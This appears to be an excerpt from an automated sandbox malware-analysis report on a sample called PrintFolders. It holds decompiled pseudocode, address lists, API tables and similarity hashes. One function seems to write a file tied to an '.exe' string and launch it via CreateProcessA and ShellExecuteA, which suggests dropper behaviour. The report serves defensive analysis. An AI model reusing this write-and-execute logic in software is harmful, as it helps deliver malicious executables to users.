														_t336 =  *(_t389 + 0x40);
														_t351 = _t350 + 1;
														_t260 = _t336;
														if(_t351 < 0x1000) {
															L50:
															_push(_t351);
															E10003216(_t336);
															_t389 = _t389 + 8;
															goto L51;
														} else {
															_t307 =  *(_t336 - 4);
															_t341 = _t351 + 0x23;
															if(_t260 - _t307 + 0xfffffffc > 0x1f) {
																goto L63;
															} else {
																goto L50;
															}
														}
													}
												} else {
													_t337 =  *((intOrPtr*)(_t389 + 0x24));
													_t352 = _t349 + 1;
													_t269 = _t337;
													if(_t352 < 0x1000) {
														L39:
														_push(_t352);
														E10003216(_t337);
														_t389 = _t389 + 8;
														goto L40;
													} else {
														_t307 =  *(_t337 - 4);
														_t341 = _t352 + 0x23;
														if(_t269 - _t307 + 0xfffffffc > 0x1f) {
															goto L62;
														} else {
															goto L39;
														}
													}
												}
											} else {
												_t338 = _v552;
												_t353 = _t348 + 1;
												_t274 = _t338;
												if(_t353 < 0x1000) {
													L35:
													_push(_t353);
													E10003216(_t338);
													_t389 = _t389 + 8;
													goto L36;
												} else {
													_t307 =  *(_t338 - 4);
													_t341 = _t353 + 0x23;
													if(_t274 - _t307 + 0xfffffffc > 0x1f) {
														goto L62;
													} else {
														goto L35;
													}
												}
											}
										} else {
											_t339 = _t251 + 1;
											_t278 = _t356;
											if(_t339 < 0x1000) {
												L31:
												_push(_t339);
												E10003216(_t356);
												_t389 = _t389 + 8;
												goto L32;
											} else {
												_t356 =  *(_t356 - 4);
												_t307 = _t339 + 0x23;
												if(_t278 - _t356 + 0xfffffffc > 0x1f) {
													L62:
													E1000633C(_t294, _t307, _t341, __eflags);
													L63:
													E1000633C(_t294, _t307, _t341, __eflags);
													L64:
													E1000633C(_t294, _t307, _t341, __eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_t380 = _t389;
													_t393 = _t389 - 0xc;
													_push(_t368);
													_t370 = _t307;
													_push(_t356);
													_t358 = _v552;
													_t190 = _t370[4];
													 *(_t380 - 8) = _t190;
													__eflags = _t190 - _t358;
													if(_t190 > _t358) {
														L94:
														return _t190;
													} else {
														_push(_t294);
														_t295 = _t370[5];
														_v20 = _t295;
														__eflags = _t295 - _t358;
														if(__eflags == 0) {
															L93:
															goto L94;
														} else {
															if(__eflags >= 0) {
																__eflags = _t358 - 0x10;
																if(_t358 >= 0x10) {
																	goto L93;
																} else {
																	__eflags = _t295 - 0x10;
																	if(_t295 < 0x10) {
																		goto L93;
																	} else {
																		_t360 =  *_t370;
																		E10005BC0(_t370, _t360, _t190 + 1);
																		_t393 = _t393 + 0xc;
																		_t309 = _t370[5] + 1;
																		__eflags = _t309 - 0x1000;
																		if(_t309 < 0x1000) {
																			L92:
																			_push(_t309);
																			_t190 = E10003216(_t360);
																			_t370[5] = 0xf;
																			goto L93;
																		} else {
																			_t342 =  *(_t360 - 4);
																			_t309 = _t309 + 0x23;
																			_t358 = _t360 - _t342;
																			_t144 = _t358 - 4; // -3
																			__eflags = _t144 - 0x1f;
																			if(__eflags > 0) {
																				goto L95;
																			} else {
																				_t360 = _t342;
																				goto L92;
																			}
																		}
																	}
																}
															} else {
																_t342 = 0x7fffffff;
																_t309 = _t358 - _t190;
																__eflags = 0x7fffffff - _v16 - _t309;
																if(0x7fffffff - _v16 < _t309) {
																	L96:
																	E10001CA0(_t309);
																	goto L97;
																} else {
																	_t315 = _t358 | 0x0000000f;
																	__eflags = _t315 - 0x7fffffff;
																	if(__eflags <= 0) {
																		_t217 = _t295 >> 1;
																		_t342 = 0x7fffffff - _t217;
																		__eflags = _t295 - 0x7fffffff - _t217;
																		if(__eflags <= 0) {
																			_t218 = _t217 + _t295;
																			__eflags = _t315 - _t218;
																			_t316 =  <  ? _t218 : _t315;
																			__eflags = _t316;
																			_v12 = _t316;
																			_t219 = _t316;
																		} else {
																			_t219 = 0x7fffffff;
																			_v12 = 0x7fffffff;
																		}
																	} else {
																		_t219 = 0x7fffffff;
																		_v12 = 0x7fffffff;
																	}
																	_t309 =  ~(0 | __eflags > 0x00000000) | _t219 + 0x00000001;
																	__eflags = _t309 - 0x1000;
																	if(_t309 < 0x1000) {
																		__eflags = _t309;
																		if(__eflags == 0) {
																			_t295 = 0;
																			__eflags = 0;
																		} else {
																			_push(_t309);
																			_t230 = E10003229(_t295, _t358, _t370, __eflags);
																			_t393 = _t393 + 4;
																			_t295 = _t230;
																		}
																		goto L81;
																	} else {
																		_t127 = _t309 + 0x23; // 0x23
																		_t231 = _t127;
																		__eflags = _t231 - _t309;
																		if(__eflags <= 0) {
																			L97:
																			E10001DE0(_t295);
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			_push(_t380);
																			_t381 = _t393;
																			_push(_t309);
																			_push(_t295);
																			_push(_t370);
																			_t372 =  *((intOrPtr*)(_t381 + 8));
																			_t297 = _t309;
																			 *(_t381 - 4) = _t297;
																			_t343 =  *(_t372 + 0x14);
																			_t310 =  *(_t372 + 0x10);
																			__eflags = _t343 - _t310 - 1;
																			if(_t343 - _t310 < 1) {
																				_push(1);
																				_v4 = 0;
																				_push(_v4);
																				_push(1);
																				_t372 = E10002F60(_t297, _t372, _t358, _t372);
																			} else {
																				_t150 = _t310 + 1; // 0x1
																				 *(_t372 + 0x10) = _t150;
																				_push(_t358);
																				_t361 = _t372;
																				__eflags = _t343 - 0x10;
																				if(_t343 >= 0x10) {
																					_t361 =  *_t372;
																				}
																				__eflags = _t361 - 0x10014e71;
																				if(_t361 >= 0x10014e71) {
																					L106:
																					_v4 = 1;
																				} else {
																					__eflags = _t361 + _t310 - "\\";
																					if(_t361 + _t310 < "\\") {
																						goto L106;
																					} else {
																						__eflags = _t361 - "\\";
																						if(_t361 > "\\") {
																							_v4 = _t361 - "\\";
																						} else {
																							_v4 = 0;
																						}
																					}
																				}
																				_t156 = _t310 + 1; // 0x1
																				E10005BC0(_t361 + 1, _t361, _t156);
																				E10005BC0(_t361, "\\", _v4);
																				_t160 = _v4 + 0x10014e71; // 0x10014e72
																				E10005BC0(_t361 + _v4, _t160, 1 - _v4);
																			}
																			 *_t297 = 0;
																			_t297[4] = 0;
																			_t297[5] = 0;
																			asm("movups xmm0, [esi]");
																			asm("movups [ebx], xmm0");
																			asm("movq xmm0, [esi+0x10]");
																			asm("movq [ebx+0x10], xmm0");
																			 *(_t372 + 0x10) = 0;
																			 *(_t372 + 0x14) = 0xf;
																			 *_t372 = 0;
																			return _t297;
																		} else {
																			_push(_t231);
																			_t232 = E10003229(_t295, _t358, _t370, __eflags);
																			_t393 = _t393 + 4;
																			__eflags = _t232;
																			if(__eflags == 0) {
																				L95:
																				E1000633C(_t295, _t309, _t342, __eflags);
																				goto L96;
																			} else {
																				_t128 = _t232 + 0x23; // 0x23
																				_t295 = _t128 & 0xffffffe0;
																				 *(_t295 - 4) = _t232;
																				L81:
																				_t370[5] = _v12;
																				_t370[4] = _t358;
																				__eflags = _v20 - 0x10;
																				_push(_v16 + 1);
																				if(_v20 < 0x10) {
																					_push(_t370);
																					_push(_t295);
																					E10005BC0();
																					_t225 = _v16;
																					 *_t370 = _t295;
																					_t370[4] = _t225;
																					return _t225;
																				} else {
																					_t364 =  *_t370;
																					_push(_t364);
																					_push(_t295);
																					E10005BC0();
																					_t393 = _t393 + 0xc;
																					_t321 = _v20 + 1;
																					__eflags = _t321 - 0x1000;
																					if(_t321 < 0x1000) {
																						L85:
																						_push(_t321);
																						E10003216(_t364);
																						_t228 = _v16;
																						 *_t370 = _t295;
																						_t370[4] = _t228;
																						return _t228;
																					} else {
																						_t342 =  *(_t364 - 4);
																						_t309 = _t321 + 0x23;
																						_t358 = _t364 - _t342;
																						_t137 = _t358 - 4; // -3
																						__eflags = _t137 - 0x1f;
																						if(__eflags > 0) {
																							goto L95;
																						} else {
																							_t364 = _t342;
																							goto L85;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x10002450
0x10002450
0x10002450
0x10002456
0x1000245c
0x10002463
0x1000246b
0x1000246e
0x1000246f
0x1000247d
0x10002494
0x1000249c
0x100024a3
0x100024ae
0x100024b3
0x100024bb
0x100024cc
0x100024d1
0x100024d8
0x100024db
0x100024e6
0x100024f1
0x100024fc
0x10002507
0x10002514
0x10002517
0x1000251c
0x1000251f
0x1000251f
0x1000252a
0x10002532
0x10002539
0x100029b4
0x00000000
0x1000253f
0x10002547
0x100029b0
0x100029b0
0x00000000
0x1000254d
0x1000254d
0x10002556
0x00000000
0x10002565
0x1000256a
0x100029ab
0x00000000
0x10002570
0x10002574
0x10002579
0x1000257e
0x10002972
0x00000000
0x10002584
0x10002584
0x10002589
0x10002598
0x1000259d
0x100025a2
0x100025a7
0x100025a9
0x100025ac
0x100025b1
0x100025b9
0x100025d9
0x100025e0
0x100025f0
0x100025bb
0x100025be
0x100025c0
0x100025c6
0x100025c8
0x100025c8
0x100025ca
0x100025cf
0x100025d2
0x100025d2
0x100025f2
0x100025f9
0x100025fe
0x1000260f
0x10002616
0x1000261d
0x10002624
0x10002628
0x1000262f
0x10002633
0x10002634
0x10002639
0x1000263e
0x10002641
0x10002674
0x10002679
0x1000267d
0x10002682
0x10002687
0x1000268b
0x10002643
0x1000264b
0x10002653
0x10002658
0x1000265a
0x1000265b
0x10002667
0x1000266a
0x1000266e
0x1000266e
0x1000268d
0x10002695
0x1000269d
0x100026a9
0x100026ac
0x100026b0
0x100026b2
0x100026b2
0x100026b7
0x100026d2
0x100026da
0x100026dc
0x100026e1
0x100026ed
0x100026ef
0x100026f5
0x1000271e
0x10002720
0x1000272f
0x1000272f
0x10002722
0x10002722
0x10002723
0x10002728
0x1000272b
0x1000272b
0x00000000
0x100026f7
0x100026f7
0x100026f7
0x100026fa
0x100026fc
0x10002a02
0x00000000
0x10002702
0x10002702
0x10002703
0x10002708
0x1000270b
0x1000270d
0x00000000
0x10002713
0x10002713
0x10002716
0x10002719
0x10002731
0x10002735
0x10002736
0x1000273d
0x10002746
0x10002749
0x10002751
0x00000000
0x10002751
0x1000270d
0x100026fc
0x100026b9
0x100026b9
0x100026bc
0x100026c0
0x100026c8
0x10002755
0x10002755
0x1000275f
0x1000278c
0x1000278c
0x10002793
0x100027c2
0x100027c2
0x100027c6
0x100027ce
0x100027d6
0x100027de
0x1000280d
0x10002816
0x10002823
0x10002848
0x1000284d
0x10002855
0x1000286d
0x10002874
0x10002874
0x1000284d
0x1000288b
0x1000289f
0x100028a6
0x100028b2
0x100028bb
0x100028c4
0x100028cd
0x100028d6
0x100028df
0x100028e8
0x100028f1
0x100028fa
0x1000290a
0x1000291e
0x1000292f
0x1000292f
0x10002935
0x1000293c
0x1000296b
0x1000296b
0x10002977
0x10002977
0x1000297e
0x100029b9
0x100029c0
0x100029cf
0x100029de
0x100029e6
0x100029f5
0x100029f6
0x10002a01
0x10002980
0x10002980
0x10002984
0x10002985
0x1000298d
0x1000299f
0x1000299f
0x100029a1
0x100029a6
0x00000000
0x1000298f
0x1000298f
0x10002992
0x1000299d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000299d
0x1000298d
0x1000293e
0x1000293e
0x10002942
0x10002943
0x1000294b
0x10002961
0x10002961
0x10002963
0x10002968
0x00000000
0x1000294d
0x1000294d
0x10002950
0x1000295b
0x00000000
0x00000000
0x00000000
0x00000000
0x1000295b
0x1000294b
0x100027e0
0x100027e0
0x100027e4
0x100027e5
0x100027ed
0x10002803
0x10002803
0x10002805
0x1000280a
0x00000000
0x100027ef
0x100027ef
0x100027f2
0x100027fd
0x00000000
0x00000000
0x00000000
0x00000000
0x100027fd
0x100027ed
0x10002795
0x10002795
0x10002799
0x1000279a
0x100027a2
0x100027b8
0x100027b8
0x100027ba
0x100027bf
0x00000000
0x100027a4
0x100027a4
0x100027a7
0x100027b2
0x00000000
0x00000000
0x00000000
0x00000000
0x100027b2
0x100027a2
0x10002761
0x10002761
0x10002764
0x1000276c
0x10002782
0x10002782
0x10002784
0x10002789
0x00000000
0x1000276e
0x1000276e
0x10002771
0x1000277c
0x10002a07
0x10002a07
0x10002a0c
0x10002a0c
0x10002a11
0x10002a11
0x10002a16
0x10002a17
0x10002a18
0x10002a19
0x10002a1a
0x10002a1b
0x10002a1c
0x10002a1d
0x10002a1e
0x10002a1f
0x10002a21
0x10002a23
0x10002a26
0x10002a27
0x10002a29
0x10002a2a
0x10002a2d
0x10002a30
0x10002a33
0x10002a35
0x10002ba4
0x10002ba9
0x10002a3b
0x10002a3b
0x10002a3c
0x10002a3f
0x10002a42
0x10002a44
0x10002ba3
0x00000000
0x10002a4a
0x10002a4a
0x10002b5c
0x10002b5f
0x00000000
0x10002b61
0x10002b61
0x10002b64
0x00000000
0x10002b66
0x10002b66
0x10002b6c
0x10002b74
0x10002b77
0x10002b78
0x10002b7e
0x10002b92
0x10002b92
0x10002b94
0x10002b9c
0x00000000
0x10002b80
0x10002b80
0x10002b83
0x10002b86
0x10002b88
0x10002b8b
0x10002b8e
0x00000000
0x10002b90
0x10002b90
0x00000000
0x10002b90
0x10002b8e
0x10002b7e
0x10002b64
0x10002a50
0x10002a52
0x10002a57
0x10002a5e
0x10002a60
0x10002bb1
0x10002bb1
0x00000000
0x10002a66
0x10002a68
0x10002a6b
0x10002a6d
0x10002a78
0x10002a7a
0x10002a7c
0x10002a7e
0x10002a8a
0x10002a8c
0x10002a8e
0x10002a8e
0x10002a91
0x10002a94
0x10002a80
0x10002a80
0x10002a85
0x10002a85
0x10002a6f
0x10002a6f
0x10002a71
0x10002a71
0x10002aa0
0x10002aa2
0x10002aa8
0x10002ad1
0x10002ad3
0x10002ae2
0x10002ae2
0x10002ad5
0x10002ad5
0x10002ad6
0x10002adb
0x10002ade
0x10002ade
0x00000000
0x10002aaa
0x10002aaa
0x10002aaa
0x10002aad
0x10002aaf
0x10002bb6
0x10002bb6
0x10002bbb
0x10002bbc
0x10002bbd
0x10002bbe
0x10002bbf
0x10002bc0
0x10002bc1
0x10002bc3
0x10002bc4
0x10002bc5
0x10002bc6
0x10002bc9
0x10002bcb
0x10002bce
0x10002bd3
0x10002bd8
0x10002bdb
0x10002c64
0x10002c69
0x10002c6f
0x10002c72
0x10002c79
0x10002be1
0x10002be1
0x10002be4
0x10002be7
0x10002be8
0x10002bea
0x10002bed
0x10002bef
0x10002bef
0x10002bf1
0x10002bf7
0x10002c20
0x10002c20
0x10002bf9
0x10002bfc
0x10002c01
0x00000000
0x10002c03
0x10002c03
0x10002c09
0x10002c1b
0x10002c0b
0x10002c0b
0x10002c0b
0x10002c09
0x10002c01
0x10002c27
0x10002c30
0x10002c3e
0x10002c4e
0x10002c59
0x10002c61
0x10002c7b
0x10002c83
0x10002c8a
0x10002c91
0x10002c94
0x10002c97
0x10002c9c
0x10002ca1
0x10002ca8
0x10002caf
0x10002cb7
0x10002ab5
0x10002ab5
0x10002ab6
0x10002abb
0x10002abe
0x10002ac0
0x10002bac
0x10002bac
0x00000000
0x10002ac6
0x10002ac6
0x10002ac9
0x10002acc
0x10002ae4
0x10002ae7
0x10002aee
0x10002af1
0x10002af5
0x10002af6
0x10002b41
0x10002b42
0x10002b43
0x10002b48
0x10002b4e
0x10002b50
0x10002b59
0x10002af8
0x10002af8
0x10002afa
0x10002afb
0x10002afc
0x10002b04
0x10002b07
0x10002b08
0x10002b0e
0x10002b26
0x10002b26
0x10002b28
0x10002b2d
0x10002b33
0x10002b35
0x10002b3e
0x10002b10
0x10002b10
0x10002b13
0x10002b16
0x10002b18
0x10002b1b
0x10002b1e
0x00000000
0x10002b24
0x10002b24
0x00000000
0x10002b24
0x10002b1e
0x10002b0e
0x10002af6
0x10002ac0
0x10002aaf
0x10002aa8
0x10002a60
0x10002a4a
0x10002a44
0x00000000
0x00000000
0x00000000
0x1000277c
0x1000276c
0x1000275f
0x100026b7
0x1000257e
0x1000256a
0x10002556
0x10002547

APIs

Part of subcall function 10006436: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10002479,00000000), ref: 10006449
Part of subcall function 10006436: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000647A

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 10002842
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 1000286D
CloseHandle.KERNEL32(00000000), ref: 10002874
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10002902
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 1000292F
CoUninitialize.OLE32 ref: 100029E6
Concurrency::cancel_current_task.LIBCPMT ref: 10002A02

Strings

D, xrefs: 1000288B
open, xrefs: 10002928
.exe, xrefs: 100025CA, 100025DB

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: File$CreateTime$CloseConcurrency::cancel_current_taskExecuteHandleProcessShellSystemUninitializeUnothrow_t@std@@@Write__ehfuncinfo$??2@
String ID: .exe$D$open
API String ID: 486856157-1167955346
Opcode ID: 94542779c2cbe68dcfa0da88a96b167bcfe548502e27a71f2e7a21729ccdced1
Instruction ID: a5dc631b58f12eb130fcfc4579c604e67e83b8f68047a22d4781f4a2ecc51844
Opcode Fuzzy Hash: 94542779c2cbe68dcfa0da88a96b167bcfe548502e27a71f2e7a21729ccdced1
Instruction Fuzzy Hash: 2CE1E2716083809BF724CB24CC45B9FB7E5FF85380F108A2CF599962D5DBB1E9848B92

Uniqueness

Uniqueness Score: -1.00%

Function 004286BE Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E004286BE(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E0042840C(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E0042540E(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E00428377(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00425359(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x4508e0 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E00428124(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x4508e0 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x4508e0 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E00428377();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x4508e0 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E004135BB(GetLastError());
											 *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00425521( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E00428586(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0041EC93(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E004135BB(_t271);
							 *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x4508e0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E004135F1(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x4508e0 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E004135BB(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E00428377();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E004135DE(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E004135F1(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E004135DE(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E004135F1(_t289)));
				}
			}

0x004286e1
0x004286e5
0x004286e6
0x004286e6
0x004286e6
0x004286e8
0x004286eb
0x004286ee
0x00428709
0x0042870e
0x00428711
0x00428713
0x00428715
0x00428734
0x0042873b
0x00428742
0x00428745
0x00428751
0x00428754
0x0042875c
0x0042875d
0x00428760
0x00428760
0x00428762
0x00428767
0x00428769
0x0042876c
0x00428774
0x00428777
0x004287e4
0x004287e5
0x004287eb
0x004287ed
0x00428836
0x00428839
0x00428842
0x00428845
0x00428848
0x0042884a
0x0042884a
0x0042884a
0x0042883b
0x0042883e
0x0042883e
0x0042884f
0x00428852
0x0042885e
0x00428863
0x0042886f
0x00428879
0x0042887d
0x00428887
0x0042888a
0x00428895
0x0042889a
0x004288b9
0x004288bc
0x004288c0
0x004288c1
0x004288c7
0x004288cc
0x004288cf
0x004288d1
0x004288d3
0x004288d8
0x004288da
0x004288dc
0x004288df
0x004288e1
0x004288fb
0x0042891f
0x00428923
0x00428927
0x00428929
0x0042892d
0x0042892f
0x00428939
0x0042893c
0x00428943
0x00428943
0x00428943
0x00428943
0x0042892d
0x00428948
0x00428954
0x00428956
0x004289e1
0x004289e1
0x00000000
0x0042895c
0x0042895c
0x00428960
0x00000000
0x00000000
0x00428965
0x00428977
0x0042897f
0x00428982
0x00428983
0x00428986
0x0042898d
0x00428992
0x00428995
0x004289c9
0x004289d3
0x004289d3
0x004289dd
0x00000000
0x004289dd
0x0042899e
0x004289b7
0x004289be
0x004287de
0x00000000
0x004287de
0x00428956
0x004288e3
0x00000000
0x0042889c
0x004288a3
0x004288a6
0x004288a8
0x00000000
0x00000000
0x004288aa
0x004288ac
0x004288ac
0x00000000
0x004288b2
0x0042889a
0x004287f5
0x004287f8
0x00428813
0x00428818
0x0042881e
0x00428820
0x0042882b
0x0042882b
0x00000000
0x00428820
0x00428779
0x00428780
0x00428782
0x004287b9
0x004287b9
0x004287c3
0x004287c6
0x004287cd
0x004287cd
0x004287cd
0x004287d9
0x00000000
0x004287d9
0x00428784
0x00428788
0x00000000
0x00000000
0x0042878a
0x00428799
0x0042879e
0x004287a1
0x004287a2
0x004287a5
0x004287a5
0x004287ac
0x004287ae
0x004287b1
0x004287b4
0x004287b7
0x00000000
0x00000000
0x00000000
0x00428717
0x0042871c
0x0042871f
0x00428726
0x00000000
0x00428726
0x004286f0
0x004286f0
0x004286f5
0x004286f5
0x004286fb
0x004286fd
0x00000000
0x00428702

APIs

Part of subcall function 00428377: CreateFileW.KERNEL32(00000000,00000000,?,00428767,?,?,00000000,?,00428767,00000000,0000000C), ref: 00428394

GetLastError.KERNEL32 ref: 004287D2
__dosmaperr.LIBCMT ref: 004287D9
GetFileType.KERNEL32(00000000), ref: 004287E5
GetLastError.KERNEL32 ref: 004287EF
__dosmaperr.LIBCMT ref: 004287F8
CloseHandle.KERNEL32(00000000), ref: 00428818
CloseHandle.KERNEL32(0041E0F8), ref: 00428965
GetLastError.KERNEL32 ref: 00428997
__dosmaperr.LIBCMT ref: 0042899E

Strings

H, xrefs: 00428923

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
